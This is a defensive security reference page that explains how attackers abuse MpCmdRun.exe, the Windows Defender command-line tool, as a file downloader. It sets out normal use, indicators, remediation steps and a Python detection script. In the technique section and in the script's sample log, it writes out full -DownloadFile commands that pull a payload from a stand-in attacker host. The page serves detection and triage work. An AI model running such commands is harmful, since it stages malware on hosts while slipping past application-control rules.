Classification: High Risk | Windows | Legitimate | Commonly Abused | Security Tool

MpCmdRun.exe - Windows Defender CLI Security Analysis

MpCmdRun.exe is the **Windows Defender command-line interface**. It is legitimate for running scans, updating signatures and managing quarantine, but attackers abuse it as a **LOLBin to download files** with the -DownloadFile parameter. Because the request is issued by a Microsoft-signed binary running from a trusted path, the fetch can pass application-control and egress rules that would stop an unknown downloader, while the content it retrieves is a malicious payload.

Risk Summary

HIGH priority for SOC triage. MpCmdRun.exe is a legitimate Defender tool that can be turned into a file downloader: -DownloadFile fetches an arbitrary URL to an arbitrary local path. Alert on that parameter, on destinations outside Defender's own directories, and on invocations by non-administrative users. Not every Defender platform version accepts -DownloadFile (Microsoft restricted it after the abuse became public), so confirm what the installed build supports before treating the parameter's absence as evidence that nothing was downloaded.

Overview

What is MpCmdRun.exe?

MpCmdRun.exe is the command-line front end to the Microsoft Defender Antivirus platform. Administrators and scripts use it to start scans, pull signature updates, list and restore quarantined items and query engine status without the graphical Windows Security app.

Legitimate Functions

Defender Operations:

  • Run scans (Quick, Full, Custom)
  • Update definitions
  • Manage threats
  • Check status

LOLBin Capability

-DownloadFile Parameter:

  • Downloads a file from a URL given with -url to a local path given with -path
  • The download is performed by a Microsoft-signed binary in a trusted location, so allow-lists keyed on signer or path do not stop it
  • Gives an attacker a built-in downloader without dropping any tooling of their own

Normal Behavior


Expected Process State

Property   Expected Value
Path       C:\ProgramData\Microsoft\Windows Defender\Platform\*\MpCmdRun.exe
Parent     cmd.exe or powershell.exe (elevated)
User       Administrator or SYSTEM
Context    Defender management (scans, signature updates, quarantine handling)

Legitimate Commands

MpCmdRun.exe -Scan -ScanType 1      (quick scan; 2 = full scan, 3 = custom scan of the path given with -File)
MpCmdRun.exe -SignatureUpdate       (fetch the latest definitions)
MpCmdRun.exe -Restore -ListAll      (list quarantined items that can be restored)

Common Locations

C:\ProgramData\Microsoft\Windows Defender\Platform\*\MpCmdRun.exe
C:\Program Files\Windows Defender\MpCmdRun.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE

Command:     MpCmdRun.exe -Scan -ScanType 1
             MpCmdRun.exe -SignatureUpdate
Context:     Defender management

SUSPICIOUS

Command:     MpCmdRun.exe -DownloadFile -url http://... -path C:\...
Context:     File download to a user-writable or public directory
             Non-IT user, or a parent process that is not an admin shell

Dangerous Parameters

Parameter      Risk      Description
-DownloadFile  CRITICAL  Switches the tool into download mode; -url and -path only matter alongside it
-url           CRITICAL  Source URL the file is fetched from
-path          HIGH      Destination path; a public or temp directory indicates payload staging

Abuse Techniques


Technique #1: LOLBin File Download (T1105)

Download Malware via Defender:

MpCmdRun.exe -DownloadFile -url "http://attacker.com/payload.exe" -path "C:\Users\Public\payload.exe"

Why It Works:

  • The download is performed by a Microsoft-signed binary, so signer-based trust rules allow it
  • The binary is a security tool, so analysts and tooling tend to treat its activity as benign
  • Application control policies that allow signed Microsoft code do not block the fetch (they may still block the payload when it is run, which is why the subsequent-execution check matters)
  • The outbound request originates from a Defender process, so egress rules that trust Defender traffic may let it through


Protection and Remediation

Defense: Command Line Monitoring

Alert on any process-creation event whose image name is MpCmdRun.exe and whose command line contains -DownloadFile; match the parameter case-insensitively. Windows Security event 4688 (with command-line auditing enabled) or Sysmon Event ID 1 supplies the image path, command line, parent and user. Raise the severity when the image is outside the Defender Platform directory, the destination is a user-writable or public folder, or the user is not an administrator.

If Compromise Suspected

  1. Identify the downloaded file path from the -path value in the command line
  2. Acquire and analyze the downloaded content (hash, signer, detonation)
  3. Check whether the file was executed (a later process creation with that image path, or a module load of it)
  4. Hunt for related activity: the same -url across other hosts, and the parent process chain that launched MpCmdRun.exe

Investigation Checklist


  • Review full command line
  • Check for -DownloadFile parameter
  • Identify source URL
  • Locate downloaded file
  • Analyze file content
  • Check for subsequent execution
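Detection and triage logic for the command-line monitoring defense and the checklist above, as an added example that is not part of the original page. It parses constructed process-creation records (Sysmon Event ID 1 field names; the pipe-delimited layout and the Platform version folder are assumptions), flags MpCmdRun.exe launches that carry -DownloadFile, extracts the -url and -path values, scores the context against the expected-state table, and looks for a later process whose image is the dropped path. The sample events, hostnames and the privileged-user heuristic are all made up for the example.

```python
"""Added example (not from the original page): flag MpCmdRun.exe -DownloadFile
launches in process-creation records and tie each one to any later execution
of the file it dropped. Record layout, sample events and the privileged-user
heuristic are assumptions made for this example."""
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample records, "timestamp|Key=Value|Key=Value". Field names follow
# Sysmon Event ID 1; the layout and the Platform version folder are made up.
SAMPLE_LOG = r"""
2026-01-18T09:12:03Z|Image=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MpCmdRun.exe|CommandLine="MpCmdRun.exe" -Scan -ScanType 1|ParentImage=C:\Windows\System32\cmd.exe|User=NT AUTHORITY\SYSTEM
2026-01-18T09:15:41Z|Image=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MpCmdRun.exe|CommandLine="MpCmdRun.exe" -DownloadFile -url "http://attacker.example/payload.exe" -path "C:\Users\Public\payload.exe"|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\jsmith
2026-01-18T09:16:02Z|Image=C:\Users\Public\payload.exe|CommandLine="C:\Users\Public\payload.exe"|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\jsmith
2026-01-18T10:01:00Z|Image=C:\Users\jsmith\Downloads\MpCmdRun.exe|CommandLine=MpCmdRun.exe -downloadfile -url https://files.example/tool.dll -path C:\Users\jsmith\AppData\Local\Temp\tool.dll|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|User=CORP\jsmith
"""

# Where the page says the binary normally lives (compared case-insensitively).
EXPECTED_IMAGE_PREFIXES = (
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
    "c:\\program files\\windows defender\\",
)
# Directories any user can write to; a payload landing here is staging.
STAGING_MARKERS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")


@dataclass
class Finding:
    ts: str
    user: str
    image: str
    url: Optional[str]
    dest: Optional[str]
    flags: List[str] = field(default_factory=list)
    executed_at: List[str] = field(default_factory=list)


def parse_events(text: str) -> List[dict]:
    """Turn the pipe-delimited records into dicts keyed by field name."""
    events = []
    for line in text.strip().splitlines():
        parts = line.split("|")
        ev = {"ts": parts[0]}
        for part in parts[1:]:
            key, value = part.split("=", 1)
            ev[key] = value
        events.append(ev)
    return events


def has_flag(cmdline: str, flag: str) -> bool:
    """Whole-token match, case-insensitive so -downloadfile does not evade the rule."""
    return re.search(r"(?i)(?<!\S)" + re.escape(flag) + r"(?!\S)", cmdline) is not None


def flag_value(cmdline: str, flag: str) -> Optional[str]:
    """Value following a flag, with or without surrounding double quotes."""
    m = re.search(r"(?i)(?<!\S)" + re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def is_privileged(user: str) -> bool:
    """Crude stand-in for the page's 'Administrator or SYSTEM' expectation;
    a real rule would resolve group membership instead of matching names."""
    u = user.lower()
    return u == "nt authority\\system" or u.endswith("\\administrator")


def detect(events: List[dict]) -> List[Finding]:
    findings = []
    for ev in events:
        if ntpath.basename(ev["Image"]).lower() != "mpcmdrun.exe":
            continue
        if not has_flag(ev["CommandLine"], "-DownloadFile"):
            continue
        f = Finding(ts=ev["ts"], user=ev["User"], image=ev["Image"],
                    url=flag_value(ev["CommandLine"], "-url"),
                    dest=flag_value(ev["CommandLine"], "-path"))
        if not ev["Image"].lower().startswith(EXPECTED_IMAGE_PREFIXES):
            f.flags.append("image-outside-defender-platform-dir")
        if f.url and f.url.lower().startswith("http://"):
            f.flags.append("cleartext-http")
        if f.dest and any(m in f.dest.lower() for m in STAGING_MARKERS):
            f.flags.append("writable-staging-dir")
        if not is_privileged(ev["User"]):
            f.flags.append("non-admin-user")
        # Checklist step "check for subsequent execution": a later process whose
        # image is the downloaded path.
        if f.dest:
            f.executed_at = [e["ts"] for e in events
                             if e["ts"] > ev["ts"] and e["Image"].lower() == f.dest.lower()]
        findings.append(f)
    return findings


def run_sample() -> List[Finding]:
    return detect(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for f in run_sample():
        status = "EXECUTED at " + ", ".join(f.executed_at) if f.executed_at else "not seen executing"
        print(f"{f.ts} {f.user}: {f.url} -> {f.dest} [{', '.join(f.flags)}] {status}")
```

Running the script reports the two download events and shows that the first payload ran seconds later while the second copy of the tool was launched from a Downloads folder rather than the Platform directory. The path comparison is string-based; on real telemetry normalize 8.3 names, case and symlinks before comparing, and feed the -url value into your proxy logs to find other hosts that fetched it.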

MITRE ATT&CK Techniques

  • T1105 - Ingress Tool Transfer

Last verified: January 18, 2026